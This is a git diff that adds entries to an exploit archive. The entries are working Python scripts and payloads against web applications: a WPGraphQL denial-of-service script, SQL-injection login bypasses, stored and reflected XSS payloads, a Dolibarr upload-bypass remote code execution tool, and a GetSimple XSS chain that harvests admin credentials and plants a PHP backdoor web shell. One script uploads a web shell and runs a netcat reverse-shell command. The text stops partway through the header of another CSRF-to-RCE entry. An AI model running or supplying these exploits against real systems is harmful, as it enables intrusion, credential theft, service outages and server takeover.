+
+
+
+The example above launches cmd.exe (Command Prompt) on Windows.
+
+For a full walkthrough and explanation of the exploit, please see the following blog post by the exploit's author: https://www.mnemonic.no/blog/exploiting-scratch-with-a-malicious-image/
+
+Note that the author of this exploit does not take credit for finding the vulnerability. The vulnerability was disclosed by user apple502j on Scratch's official forums.
\ No newline at end of file
diff --git a/exploits/multiple/webapps/50463.txt b/exploits/multiple/webapps/50463.txt
new file mode 100644
index 000000000..04a6e777a
--- /dev/null
+++ b/exploits/multiple/webapps/50463.txt
@@ -0,0 +1,42 @@
+# Exploit Title: WebCTRL OEM 6.5 - 'locale' Reflected Cross-Site Scripting (XSS)
+# Date: 4/07/2021
+# Exploit Author: 3ndG4me
+# Vendor Homepage: https://www.automatedlogic.com/en/products/webctrl-building-automation-system/
+# Version: 6.5 and Below
+# CVE : CVE-2021-31682
+
+--Summary--
+
+The login portal for the Automated Logic WebCTRL/WebCTRL OEM web application contains a vulnerability that allows for reflected XSS attacks due to the operatorlocale GET parameter not being sanitized.
+
+Automated Logic
+https://www.automatedlogic.com/en/products-services/webctrl-building-automation-system/
+
+--Affects--
+
+- WebCTRL OEM
+- Versions 6.5 and prior
+
+--Details--
+
+The login portal for the Automated Logic WebCTRL/WebCTRL OEM web application contains a vulnerability that allows for reflected XSS attacks due to the operatorlocale GET parameter not being sanitized. This issue impacts versions 6.5 and below. This issue works by passing in a basic XSS payload to a vulnerable GET parameter that is reflected in the output without sanitization. This can allow for several issues including but not limited to:
+
+- Hijacking a user's session
+- Using XSS payloads to capture input (keylogging)
+
+
+-- Proof of Concept --
+The following URL parameter was impacted and can be exploited with the sample payload provided below:
+- https://example.com/index.jsp?operatorlocale=en/>
+
+--Mitigation--
+
+Sanitize any user controlled input in both form fields and URL parameters to properly encode data so it is not rendered as arbitrary HTML/JavaScript.
+
+--Timeline--
+
+- 4/07/2021: XSS Vulnerability was discovered and documented.
+- 4/17/2021: A temporary CVE identifier was requested by MITRE. Automated Logic was also notified with the full details of each finding via their product security contact at https://www.automatedlogic.com/en/about/security-commitment/. A baseline 90 day disclosure timeline was established in the initial communication.
+- 7/23/2021: MITRE Assigns CVE ID CVE-2021-31682 to the vulnerability.
+- 9/08/2021: Automated Logic formally responds requesting the CVE identifier and states that the issue should be patched in newer versions of the product.
+- 10/20/2021: The researcher responds with the CVE identifier and a request for all impacted version numbers so they can release a more accurate impacted list of products when full disclosure occurs. Automate Logic responds with a list of impacted versions the same day, and the researcher publicly discloses the issue and submits a CVE details update request to MTIRE.
\ No newline at end of file
diff --git a/exploits/php/dos/49807.py b/exploits/php/dos/49807.py
new file mode 100755
index 000000000..f11d006d4
--- /dev/null
+++ b/exploits/php/dos/49807.py
@@ -0,0 +1,55 @@
+# Exploit Title: WordPress Plugin WPGraphQL 1.3.5 - Denial of Service
+# Author: Dolev Farhi
+# Date: 2021-04-12
+# Vendor Homepage: https://www.wpgraphql.com/
+# Version: 1.3.5
+# Tested on: Ubuntu
+
+
+"""
+ This attack uses duplication of fields amplified by GraphQL batched queries, resulting in server OOM and MySQL connection errors.
+"""
+
+import sys
+import requests
+
+
+def usage():
+ print('* WordPress GraphQL 1.3.5 Denial of Service *')
+ print('python {} '.format(sys.argv[0]))
+ print('python {} http://site.com 10000 100'.format(sys.argv[0]))
+ sys.exit(1)
+
+if len(sys.argv) < 4:
+ print('Missing arguments!')
+ usage()
+
+def wpgql_exists():
+ try:
+ r = requests.post(WORDPRESS_URL, json='x')
+ if 'GraphQL' in r.json()['errors'][0]['message']:
+ return True
+ except:
+ pass
+ return False
+
+# This PoC assumes graphql is located at index.php?graphql
+WORDPRESS_URL = sys.argv[1] + '/index.php?graphql'
+FORCE_MULTIPLIER = int(sys.argv[2])
+CHAINED_REQUESTS = int(sys.argv[3])
+
+if wpgql_exists is False:
+ print('Could not identify GraphQL running at "/index.php?graphql"')
+ sys.exit(1)
+
+queries = []
+
+payload = 'content \n comments { \n nodes { \n content } }' * FORCE_MULTIPLIER
+query = {'query':'query { \n posts { \n nodes { \n ' + payload + '} } }'}
+
+for _ in range(0, CHAINED_REQUESTS):
+ queries.append(query)
+
+r = requests.post(WORDPRESS_URL, json=queries)
+print('Time took: {} seconds '.format(r.elapsed.total_seconds()))
+print('Response:', r.json())
\ No newline at end of file
diff --git a/exploits/php/webapps/49434.py b/exploits/php/webapps/49434.py
new file mode 100755
index 000000000..e821f5005
--- /dev/null
+++ b/exploits/php/webapps/49434.py
@@ -0,0 +1,93 @@
+# Exploit Title: E-Learning System 1.0 - Authentication Bypass & RCE
+# Exploit Author: Himanshu Shukla & Saurav Shukla
+# Date: 2021-01-15
+# Vendor Homepage: https://www.sourcecodester.com/php/12808/e-learning-system-using-phpmysqli.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/caiwl.zip
+# Version: 1.0
+# Tested On: Kali Linux + XAMPP 7.4.4
+# Description: E-Learning System 1.0 - Authentication Bypass Via SQL Injection + Remote Code Execution
+
+#Step 1: run the exploit in python with this command: python3 exploit.py
+#Step 2: Input the URL of the vulnerable application: Example: http://10.10.10.23/caiwl/
+#Step 3: Input your LHOST where you want the reverse shell: Example: 10.9.192.23
+#Step 4: Input your LPORT that is the port where the reverse shell will spawn: Example: 4444
+#Step 5: Start a Netcat Listener on the port specified in Step 4 using this command: nc -lnvp 4444
+#Step 6: Hit enter on the if your Netcat Listener is ready, and you will get a reverse shell as soon as you hit enter.
+
+import requests
+
+print('########################################################')
+print('## E-LEARNING SYSTEM 1.0 ##')
+print('## AUTHENTICATION BYPASS & REMOTE CODE EXECUTION ##')
+print('########################################################')
+
+print('Author - Himanshu Shukla & Saurav Shukla')
+
+GREEN = '\033[32m' # Green Text
+RED = '\033[31m' # Red Text
+RESET = '\033[m' # reset to the defaults
+#Create a new session
+s = requests.Session()
+
+#Set Cookie
+cookies = {'PHPSESSID': 'd794ba06fcba883d6e9aaf6e528b0733'}
+
+LINK=input("Enter URL of The Vulnarable Application : ")
+
+#Authentication Bypass
+print("[*]Attempting Authentication Bypass...")
+values = {"user_email":"'or 1 or'", "user_pass":"lol","btnLogin":""}
+r=s.post(LINK+'admin/login.php', data=values, cookies=cookies)
+
+r=s.post(LINK+'admin/login.php', data=values, cookies=cookies)
+
+#Check if Authentication was bypassed or not.
+logged_in = True if("You login as Administrator." in r.text) else False
+l=logged_in
+if l:
+ print(GREEN+"[+]Authentication Bypass Successful!", RESET)
+else:
+ print(RED+"[-]Failed To Authenticate!", RESET)
+
+
+#Creating a PHP Web Shell
+
+phpshell = {
+ 'file':
+ (
+ 'shell.php',
+ '',
+ 'application/x-php',
+ {'Content-Disposition': 'form-data'}
+ )
+ }
+
+# Defining value for form data
+data = {'LessonChapter':'test', 'LessonTitle':'test','Category':'Docs','save':''}
+
+
+
+#Uploading Reverse Shell
+print("[*]Uploading PHP Shell For RCE...")
+upload = s.post(LINK+'/admin/modules/lesson/controller.php?action=add', cookies=cookies, files=phpshell, data=data, verify=False)
+
+shell_upload = True if("window.location='index.php'" in upload.text) else False
+u=shell_upload
+if u:
+ print(GREEN+"[+]PHP Shell has been uploaded successfully!", RESET)
+else:
+ print(RED+"[-]Failed To Upload The PHP Shell!", RESET)
+
+print("[*]Please Input Reverse Shell Details")
+LHOST=input("[*]LHOST : ")
+LPORT=input("[*]LPORT : ")
+
+print('[*]Start Your Netcat Listener With This Command : nc -lvnp '+LPORT)
+input('[*]Hit Enter if your netcat shell is ready. ')
+print('[+]Deploying The Web Shell...')
+
+
+#Executing The Webshell
+e=s.get('http://192.168.1.5/caiwl/admin/modules/lesson/files/shell.php?cmd=nc 192.168.1.2 9999 -e /bin/bash', cookies=cookies)
+
+exit()
\ No newline at end of file
diff --git a/exploits/php/webapps/49462.py b/exploits/php/webapps/49462.py
new file mode 100755
index 000000000..3680f72d6
--- /dev/null
+++ b/exploits/php/webapps/49462.py
@@ -0,0 +1,58 @@
+# Exploit Title: Library System 1.0 - Authentication Bypass Via SQL Injection
+# Exploit Author: Himanshu Shukla
+# Date: 2021-01-21
+# Vendor Homepage: https://www.sourcecodester.com/php/12275/library-system-using-php.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/libsystem.zip
+# Version: 1.0
+# Tested On: Windows 10 + XAMPP 7.4.4
+# Description: Library System 1.0 - Authentication Bypass Via SQL Injection
+#STEP 1 : Run The Exploit With This Command : python3 exploit.py
+#STEP 2 : Input the URL of Vulnable Application. For Example: http://10.9.67.23/libsystem/
+#STEP 3 : Open the Link Provided At The End After Successful authentication bypass in Browser.
+
+#Note - You Will Only Be Able To Access The Student Area as a Privileged User.
+
+import requests
+YELLOW = '\033[33m' # Yellow Text
+GREEN = '\033[32m' # Green Text
+RED = '\033[31m' # Red Text
+RESET = '\033[m' # reset to the defaults
+
+print(YELLOW+' _ ______ _ _ ___ ', RESET)
+print(YELLOW+' ___| |_ ___ / / ___|| |__ __ _ __| |/ _ \__ __', RESET)
+print(YELLOW+" / _ \ __/ __| / /|___ \| '_ \ / _` |/ _` | | | \ \ /\ / /", RESET)
+print(YELLOW+'| __/ || (__ / / ___) | | | | (_| | (_| | |_| |\ V V / ', RESET)
+print(YELLOW+' \___|\__\___/_/ |____/|_| |_|\__,_|\__,_|\___/ \_/\_/ ', RESET)
+print(YELLOW+" ", RESET)
+print('********************************************************')
+print('** LIBRARY SYSTEM 1.0 **')
+print('** AUTHENTICATION BYPASS USING SQL INJECTION **')
+print('********************************************************')
+
+print('Author - Himanshu Shukla')
+
+
+#Create a new session
+
+s = requests.Session()
+
+#Set Cookie
+cookies = {'PHPSESSID': 'c9ead80b7e767a1157b97d2ed1fa25b3'}
+
+LINK=input("Enter URL of The Vulnarable Application : ")
+
+#Authentication Bypass
+print("[*]Attempting Authentication Bypass...")
+values = {"student":"'or 1 or'","login":""}
+r=s.post(LINK+'login.php', data=values, cookies=cookies)
+
+r=s.post(LINK+'login.php', data=values, cookies=cookies)
+
+#Check if Authentication was bypassed or not.
+logged_in = True if not("Student not found" in r.text) else False
+l=logged_in
+if l:
+ print(GREEN+"[+]Authentication Bypass Successful!", RESET)
+ print(YELLOW+"[+]Open This Link To Continue As Privileged User : "+LINK+"index.php", RESET)
+else:
+ print(RED+"[-]Failed To Authenticate!", RESET)
\ No newline at end of file
diff --git a/exploits/php/webapps/49574.txt b/exploits/php/webapps/49574.txt
new file mode 100644
index 000000000..b52b438f6
--- /dev/null
+++ b/exploits/php/webapps/49574.txt
@@ -0,0 +1,19 @@
+# Exploit Title: PEEL Shopping 9.3.0 - 'Comments/Special Instructions' Stored Cross-Site Scripting
+# Date: 2021-02-16
+# Exploit Author: Anmol K Sachan
+# Vendor Homepage: https://www.peel.fr/
+# Software Link: https://sourceforge.net/projects/peel-shopping/
+# Software: PEEL SHOPPING 9.3.0
+# Vulnerability Type: Stored Cross-site Scripting
+# Vulnerability: Stored XSS
+# Tested on Windows 10 XAMPP
+# This application is vulnerable to Stored XSS vulnerability.
+# Vulnerable script: http://localhost/peel-shopping_9_3_0/achat/achat_maintenant.php
+# Vulnerable parameters: 'Comments / Special Instructions :'
+# Payload used:
+
+jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert()
+)//%0D%0A%0d%0a//\x3csVg/\x3e
+
+# POC: in the same page where we injected payload refresh the page.
+# You will see your Javascript code (XSS) executed.
\ No newline at end of file
diff --git a/exploits/php/webapps/49607.txt b/exploits/php/webapps/49607.txt
new file mode 100644
index 000000000..99786ad53
--- /dev/null
+++ b/exploits/php/webapps/49607.txt
@@ -0,0 +1,60 @@
+# Exploit Title: Web Based Quiz System 1.0 - 'name' Persistent/Stored Cross-Site Scripting
+# Date: 2021-03-02
+# Exploit Author: P.Naveen Kumar
+# Vendor Homepage: https://www.sourcecodester.com
+# Software Download Link : https://www.sourcecodester.com/php/14727/web-based-quiz-system-phpmysqli-full-source-code.html
+# Software : Web Based Quiz System
+# Version : 1.0
+# Vulnerability Type : Cross-site Scripting
+# Vulnerability : Persistent/Stored XSS
+# Tested on: Windows 10 Pro
+
+# Stored/persistent XSS has been discovered in the Web Based Quiz System created by sourcecodester/janobe
+# in registration form in name parameter affected from this vulnerability.
+# payload:
+
+# HTTP POST request
+POST http://localhost:8080/quiz/register.php HTTP/1.1
+Host: localhost:8080
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=---------------------------283640616528311462411171270636
+Content-Length: 690
+Origin: http://localhost:8080
+Connection: keep-alive
+Referer: http://localhost:8080/quiz/register.php
+Cookie: PHPSESSID=ptujqhbkupjsqjkqs7tjhnb5er
+Upgrade-Insecure-Requests: 1
+
+-----------------------------283640616528311462411171270636
+Content-Disposition: form-data; name="name"
+
+
+-----------------------------283640616528311462411171270636
+Content-Disposition: form-data; name="email"
+
+test123@gmail.com
+-----------------------------283640616528311462411171270636
+Content-Disposition: form-data; name="password"
+
+Hacker
+-----------------------------283640616528311462411171270636
+Content-Disposition: form-data; name="college"
+
+hello
+-----------------------------283640616528311462411171270636
+Content-Disposition: form-data; name="submit"
+
+
+-----------------------------283640616528311462411171270636--
+
+POC:
+# go to url http://localhost:8080/quiz/register.php
+# then you have to fill the above payload in name/username parameter
+# then fill the remaining details
+# then click submit
+# then login to user account
+# then attempt any one quiz after attempting go to ranking section then
+# you can see xss pop up there..!
\ No newline at end of file
diff --git a/exploits/php/webapps/49711.py b/exploits/php/webapps/49711.py
new file mode 100755
index 000000000..93927ad32
--- /dev/null
+++ b/exploits/php/webapps/49711.py
@@ -0,0 +1,216 @@
+# Exploit Title: Dolibarr ERP/CRM 11.0.4 - File Upload Restrictions Bypass (Authenticated RCE)
+# Date: 16/06/2020
+# Exploit Author: Andrea Gonzalez
+# Vendor Homepage: https://www.dolibarr.org/
+# Software Link: https://github.com/Dolibarr/dolibarr
+# Version: Prior to 11.0.5
+# Tested on: Debian 9.12
+# CVE : CVE-2020-14209
+
+#!/usr/bin/python3
+
+# Choose between 3 types of exploitation: extension-bypass, file-renaming or htaccess. If no option is selected, all 3 methods are tested.
+
+import re
+import sys
+import random
+import string
+import argparse
+import requests
+import urllib.parse
+from urllib.parse import urlparse
+
+session = requests.Session()
+base_url = "http://127.0.0.1/htdocs/"
+documents_url = "http://127.0.0.1/documents/"
+proxies = {}
+user_id = -1
+
+class bcolors:
+ BOLD = '\033[1m'
+ HEADER = '\033[95m'
+ OKBLUE = '\033[94m'
+ OKGREEN = '\033[92m'
+ WARNING = '\033[93m'
+ FAIL = '\033[91m'
+ ENDC = '\033[0m'
+
+def printc(s, color):
+ print(f"{color}{s}{bcolors.ENDC}")
+
+def read_args():
+ parser = argparse.ArgumentParser(description='Dolibarr exploit - Choose one or more methods (extension-bypass, htaccess, file-renaming). If no method is chosen, every method is tested.')
+ parser.add_argument('base_url', metavar='base_url', help='Dolibarr base URL.')
+ parser.add_argument('-d', '--documents-url', dest='durl', help='URL where uploaded documents are stored (default is base_url/../documents/).')
+ parser.add_argument('-c', '--command', dest='cmd', default="id", help='Command to execute (default "id").')
+ parser.add_argument('-x', '--proxy', dest='proxy', help='Proxy to be used.')
+ parser.add_argument('--extension-bypass', dest='fbypass', action='store_true',
+ default=False,
+ help='Files with executable extensions are uploaded trying to bypass the file extension blacklist.')
+ parser.add_argument('--file-renaming', dest='frenaming', action='store_true',
+ default=False,
+ help='A PHP script is uploaded and .php extension is added using file renaming function.')
+ parser.add_argument('--htaccess', dest='htaccess', action='store_true',
+ default=False,
+ help='Apache .htaccess file is uploaded so files with .noexe extension can be executed as a PHP script.')
+ required = parser.add_argument_group('required named arguments')
+ required.add_argument('-u', '--user', help='Username', required=True)
+ required.add_argument('-p', '--password', help='Password', required=True)
+ return parser.parse_args()
+
+def error(s, end=False):
+ printc(s, bcolors.HEADER)
+ if end:
+ sys.exit(1)
+
+"""
+ Returns user id
+"""
+def login(user, password):
+ data = {
+ "actionlogin": "login",
+ "loginfunction": "loginfunction",
+ "username": user,
+ "password": password
+ }
+ login_url = urllib.parse.urljoin(base_url, "index.php")
+ r = session.post(login_url, data=data, proxies=proxies)
+ try:
+ regex = re.compile(r"user/card.php\?id=(\d+)")
+ match = regex.search(r.text)
+ return int(match.group(1))
+ except Exception as e:
+ #error(e)
+ return -1
+
+def upload(filename, payload):
+ files = {
+ "userfile": (filename, payload),
+ }
+ data = {
+ "sendit": "Send file"
+ }
+ headers = {
+ "Referer": base_url
+ }
+ upload_url = urllib.parse.urljoin(base_url, "user/document.php?id=%d" % user_id)
+ session.post(upload_url, files=files, headers=headers, data=data, proxies=proxies)
+
+def delete(filename):
+ data = {
+ "action": "confirm_deletefile",
+ "confirm": "yes",
+ "urlfile": filename
+ }
+ headers = {
+ "Referer": base_url
+ }
+ delete_url = urllib.parse.urljoin(base_url, "user/document.php?id=%d" % user_id)
+ session.post(delete_url, headers=headers, data=data, proxies=proxies)
+
+def rename(filename, new_filename):
+ data = {
+ "action": "renamefile",
+ "modulepart": "user",
+ "renamefilefrom": filename,
+ "renamefileto": new_filename,
+ "renamefilesave": "Save"
+ }
+ headers = {
+ "Referer": base_url
+ }
+ rename_url = urllib.parse.urljoin(base_url, "user/document.php?id=%d" % user_id)
+ session.post(rename_url, headers=headers, data=data, proxies=proxies)
+
+def test_payload(filename, payload, query, headers={}):
+ file_url = urllib.parse.urljoin(documents_url, "users/%d/%s?%s" % (user_id, filename, query))
+ r = session.get(file_url, headers=headers, proxies=proxies)
+ if r.status_code != 200:
+ error("Error %d %s" % (r.status_code, file_url))
+ elif payload in r.text:
+ error("Non-executable %s" % file_url)
+ else:
+ printc("Payload was successful! %s\nOutput: %s" % (file_url, r.text.strip()), bcolors.OKGREEN)
+ return True
+ return False
+
+def get_random_filename():
+ return ''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(8))
+
+def upload_executable_file_php(payload, query):
+ php_extensions = [".php", ".pht", ".phpt", ".phar", ".phtml", ".php3", ".php4", ".php5", ".php6", ".php7"]
+ random_filename = get_random_filename()
+ b = False
+ for extension in php_extensions:
+ filename = random_filename + extension
+ upload(filename, payload)
+ if test_payload(filename, payload, query):
+ b = True
+ return b
+
+def upload_executable_file_ssi(payload, command):
+ filename = get_random_filename() + ".shtml"
+ upload(filename, payload)
+ return test_payload(filename, payload, '', headers={'ACCEPT': command})
+
+def upload_and_rename_file(payload, query):
+ filename = get_random_filename() + ".php"
+ upload(filename, payload)
+ rename(filename + ".noexe", filename)
+ return test_payload(filename, payload, query)
+
+def upload_htaccess(payload, query):
+ filename = get_random_filename() + ".noexe"
+ upload(filename, payload)
+ filename_ht = get_random_filename() + ".htaccess"
+ upload(filename_ht, "AddType application/x-httpd-php .noexe\nAddHandler application/x-httpd-php .noexe\nOrder deny,allow\nAllow from all\n")
+ delete(".htaccess")
+ rename(filename_ht, ".htaccess")
+ return test_payload(filename, payload, query)
+
+
+if __name__ == "__main__":
+ args = read_args()
+ base_url = args.base_url if args.base_url[-1] == '/' else args.base_url + '/'
+ documents_url = args.durl if args.durl else urllib.parse.urljoin(base_url, "../documents/")
+ documents_url = documents_url if documents_url[-1] == '/' else documents_url + '/'
+ user = args.user
+ password = args.password
+ payload = ""
+ payload_ssi = ''
+ command = args.cmd
+ query = "cmd=%s" % command
+ if args.proxy:
+ proxies = {"http": args.proxy, "https": args.proxy}
+
+ user_id = login(user, password)
+ if user_id < 0:
+ error("Login error", True)
+ printc("Successful login, user id found: %d" % user_id, bcolors.OKGREEN)
+ print('-' * 30)
+ if not args.fbypass and not args.frenaming and not args.htaccess:
+ args.fbypass = args.frenaming = args.htaccess = True
+
+ if args.fbypass:
+ printc("Trying extension-bypass method\n", bcolors.BOLD)
+ b = upload_executable_file_php(payload, query)
+ b = upload_executable_file_ssi(payload_ssi, command) or b
+ if b:
+ printc("\nextension-bypass was successful", bcolors.OKBLUE)
+ else:
+ printc("\nextension-bypass was not successful", bcolors.WARNING)
+ print('-' * 30)
+ if args.frenaming:
+ printc("Trying file-renaming method\n", bcolors.BOLD)
+ if upload_and_rename_file(payload, query):
+ printc("\nfile-renaming was successful", bcolors.OKBLUE)
+ else:
+ printc("\nfile-renaming was not successful", bcolors.WARNING)
+ print('-' * 30)
+ if args.htaccess:
+ printc("Trying htaccess method\n", bcolors.BOLD)
+ if upload_htaccess(payload, query):
+ printc("\nhtaccess was successful", bcolors.OKBLUE)
+ else:
+ printc("\nhtaccess was not successful", bcolors.WARNING)
+ print('-' * 30)
\ No newline at end of file
diff --git a/exploits/php/webapps/49726.py b/exploits/php/webapps/49726.py
new file mode 100755
index 000000000..29e21d076
--- /dev/null
+++ b/exploits/php/webapps/49726.py
@@ -0,0 +1,125 @@
+# Exploit Title: GetSimple CMS 3.3.16 - Reflected XSS to RCE
+# Exploit Author: Bobby Cooke (boku)
+# Discovery Credits: Bobby Cooke (boku) & Adeeb Shah (@hyd3sec)
+# Date: March 29th, 2021
+# CVE ID: CVE-2020-23839 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-23839
+# Vendor Homepage: http://get-simple.info
+# Software Link: http://get-simple.info/download/
+# Version: v3.3.16
+# Tested against Server Host: Windows 10 Pro + XAMPP
+# Tested against Client Browsers: Firefox(Linux), Chrome (Linux & Windows), Edge
+# Full Disclosure & Information at: https://github.com/boku7/CVE-2020-23839
+
+# Vulnerability Description:
+# GetSimple CMS v3.3.16 suffers from a Reflected XSS on the Admin Login Portal. On August 12th, 2020, the vendor received full disclosure details of the vulnerability via private email. The vulnerability was publicly disclosed on September 13th, 2020 # via MITRE with the publication of CVE-2020-23839, which contained little details and no proof of concept. On January 20th, 2021 full disclosure and code analysis was publicly disclosed under the GetSimple CMS GitHub active issues ticket.
+# Exploit Description:
+# This exploit creates a Reflected XSS payload, in the form of a hyperlink, which exploit CVE-2020-23839. When an Administrator of the GetSimple CMS system goes to this URL in their browser and enters their credentials, a sophisticated exploitation # attack-chain will be launched, which will allow the remote attacker to gain Remote Code Execution of the server that hosts the GetSimple CMS system.
+# Attack Chain:
+# 1. Attacker tricks GetSimple CMS Admin to go to the URL provided from this exploit
+# 2. Admin then enters their credentials into the GetSimple CMS login portal
+# 3. Reflected XSS Payload triggers onAction when the Admin clicks the Submit button or presses Enter
+# 4. The XSS payload performs an XHR POST request in the background, which logs the browser into the GetSimple CMS Admin panel
+# 5. The XSS payload then performs a 2nd XHR GET request to admin/edit-theme.php, and collects the CSRF Token & Configured theme for the webpages hosted on the CMS
+# 6. The XSS payload then performs a 3rd XHR POST request to admin/edit-theme.php, which injects a PHP backdoor WebShell to all pages of the CMS
+# 7. The exploit repeatedly attempts to connect to the public /index.php page of the target GetSimple CMS system until a WebShell is returned
+# 8. When the exploit hooks to the WebShell, an interactive PHP WebShell appears in the attackers console
+
+import sys,re,argparse,requests
+from urllib.parse import quote
+from colorama import (Fore as F, Back as B, Style as S)
+from time import sleep
+
+FT,FR,FG,FY,FB,FM,FC,ST,SD,SB = F.RESET,F.RED,F.GREEN,F.YELLOW,F.BLUE,F.MAGENTA,F.CYAN,S.RESET_ALL,S.DIM,S.BRIGHT
+def bullet(char,color):
+ C=FB if color == 'B' else FR if color == 'R' else FG
+ return SB+FB+'['+ST+SB+char+SB+FB+']'+ST+' '
+info,err,ok = bullet('-','B'),bullet('-','R'),bullet('+','G')
+
+def webshell(SERVER_URL):
+ try:
+ WEB_SHELL = SERVER_URL
+ getdir = {'FierceGodKick': 'echo %CD%'}
+ r = requests.post(url=WEB_SHELL, data=getdir, verify=False)
+ status = r.status_code
+ cwd = re.findall(r'[CDEF].*', r.text)
+ if cwd:
+ cwd = cwd[0]+"> "
+ term = SB+FG+cwd+FT
+ print(SD+FR+')'+FY+'+++++'+FR+'['+FT+'=========>'+ST+SB+' WELCOME BOKU '+ST+SD+'<========'+FR+']'+FY+'+++++'+FR+'('+FT+ST)
+ while True:
+ thought = input(term)
+ command = {'FierceGodKick': thought}
+ r = requests.post(WEB_SHELL, data=command, verify=False)
+ status = r.status_code
+ if status != 200:
+ r.raise_for_status()
+ response = r.text
+ print(response)
+ else:
+ r.raise_for_status()
+ except:
+ pass
+
+def urlEncode(javascript):
+ return quote(javascript)
+
+def genXssPayload():
+ XSS_PAYLOAD = '/index/javascript:'
+ XSS_PAYLOAD += 'var s = decodeURIComponent("%2f");'
+ XSS_PAYLOAD += 'var h = "application"+s+"x-www-form-urlencoded";'
+ XSS_PAYLOAD += 'var e=function(i){return encodeURIComponent(i);};'
+ XSS_PAYLOAD += 'var user = document.forms[0][0].value;'
+ XSS_PAYLOAD += 'var pass = document.forms[0][1].value;'
+ XSS_PAYLOAD += 'var u1 = s+"admin"+s;'
+ XSS_PAYLOAD += 'var u2 = u1+"theme-edit.php";'
+ XSS_PAYLOAD += 'var xhr1 = new XMLHttpRequest();'
+ XSS_PAYLOAD += 'var xhr2 = new XMLHttpRequest();'
+ XSS_PAYLOAD += 'var xhr3 = new XMLHttpRequest();'
+ XSS_PAYLOAD += 'xhr1.open("POST",u1,true);'
+ XSS_PAYLOAD += 'xhr1.setRequestHeader("Content-Type", h);'
+ XSS_PAYLOAD += 'params = "userid="+user+"&pwd="+pass+"&submitted=Login";'
+ XSS_PAYLOAD += 'xhr1.onreadystatechange = function(){'
+ XSS_PAYLOAD += 'if (xhr1.readyState == 4 && xhr1.status == 200) {'
+ XSS_PAYLOAD += 'xhr2.onreadystatechange = function(){'
+ XSS_PAYLOAD += 'if (xhr2.readyState == 4 && xhr2.status == 200) {'
+ XSS_PAYLOAD += 'r=this.responseXML;'
+ XSS_PAYLOAD += 'nVal = r.querySelector("#nonce").value;'
+ XSS_PAYLOAD += 'eVal = r.forms[1][2].defaultValue;'
+ XSS_PAYLOAD += 'xhr3.open("POST",u2,true);'
+ XSS_PAYLOAD += 'xhr3.setRequestHeader("Content-Type", h);'
+ XSS_PAYLOAD += 'payload=e("");'
+ XSS_PAYLOAD += 'params="nonce="+nVal+"&content="+payload+"&edited_file="+eVal+"&submitsave=Save+Changes";'
+ XSS_PAYLOAD += 'xhr3.send(params);'
+ XSS_PAYLOAD += '}};'
+ XSS_PAYLOAD += 'xhr2.open("GET",u2,true);'
+ XSS_PAYLOAD += 'xhr2.responseType="document";'
+ XSS_PAYLOAD += 'xhr2.send();'
+ XSS_PAYLOAD += '}};'
+ XSS_PAYLOAD += 'xhr1.send(params);'
+ XSS_PAYLOAD += '%2f%2f'
+ return XSS_PAYLOAD
+
+def argsetup():
+ about = SB+FT+'This exploit creates a Reflected XSS payload, in the form of a hyperlink, which exploit CVE-2020-23839. When an Administrator of the GetSimple CMS system goes to this URL in their browser and enters their credentials, a sophisticated exploitation attack-chain will be launched, which will allow the remote attacker to gain Remote Code Execution of the server that hosts the GetSimple CMS system.'+ST
+ parser = argparse.ArgumentParser(description=about)
+ parser.add_argument('TargetSite',type=str,help='The routable domain name of the target site')
+ args = parser.parse_args()
+ return args
+
+if __name__ == "__main__":
+ print(SB+FB+'Exploit Author'+FT+': '+FB+'Bobby Cooke'+FT+FB)
+ print(SB+FR+' CVE-2020-23839 '+FT+'|'+FR+' GetSimpleCMS v3.3.16 '+FT)
+ print(FR+'Reflected XSS '+FT+'->'+FR+' CredHarvest Payload '+FT+'->'+FR+' XHR Chaining '+FT+'->'+FR+' RCE'+ST)
+ args = argsetup()
+ RHOST = args.TargetSite
+ WEBAPP_URL = RHOST+'/admin/'
+ WEBAPP_URL = WEBAPP_URL+'index.php'
+ PAYLOAD = genXssPayload()
+ ENCODED_PAYLOAD = urlEncode(PAYLOAD)
+ print(info+FT+'Have a '+SB+FB+'GetSimpleCMS '+SB+FC+'Admin '+ST+'go to this '+SB+FM+'URL & login'+ST+', and you will get an '+SB+FR+'RCE WebShell'+ST)
+ print(SB+FB+WEBAPP_URL+ENCODED_PAYLOAD+ST)
+ sleep(1)
+ print(ok+'Waiting for Admin to login with creds, which will trigger the RCE XHR attack chain..')
+ while True:
+ sleep(1)
+ webshell(RHOST)
\ No newline at end of file
diff --git a/exploits/php/webapps/49774.py b/exploits/php/webapps/49774.py
new file mode 100755
index 000000000..e1fdf64eb
--- /dev/null
+++ b/exploits/php/webapps/49774.py
@@ -0,0 +1,158 @@
+# Exploit Title: GetSimple CMS My SMTP Contact Plugin 1.1.1 - CSRF to RCE
+# Exploit Author: Bobby Cooke (boku)
+# Date: 15/04/2021
+# Vendor Homepage: http://get-simple.info
+# Software Link: http://get-simple.info/extend/download.php?file=files/18274/1221/my-smtp-contact_1.1.1.zip&id=1221
+# Vendor: NetExplorer
+# Version: <= v1.1.1
+# Tested against Server Host: Windows 10 Pro + XAMPP
+# Tested against Client Browsers: Firefox
+# About My SMTP Contact Plugin:
+# An authenticated admin of the GetSimple CMS application, who has implemented the My SMTP Contact plugin, can navigate to the plugins configuration page within the admin console, and configure the settings for the SMTP form. The purpose of this plugin is to enable webpages of the CMS to host a contact form, where users of the application will be able to submit requests to the owner. These requests will be sent to the owner via SMTP email.
+# CSRF Vulnerability Information:
+# The GetSimple CMS application does not utilize the SameSite flag for the session cookie, and instead uses a CSRF token "nonce" to protect against cross-site attacks. Version of the My SMTP Contact plugin v1.1.1 and before do not implement the CSRF token. The vendor was contacted March 28th 2021, and released v1.1.2 in response, which remediates this vulnerability by implementing the CSRF "nonce" token.
+# PHP Code Injection Vulnerability Information:
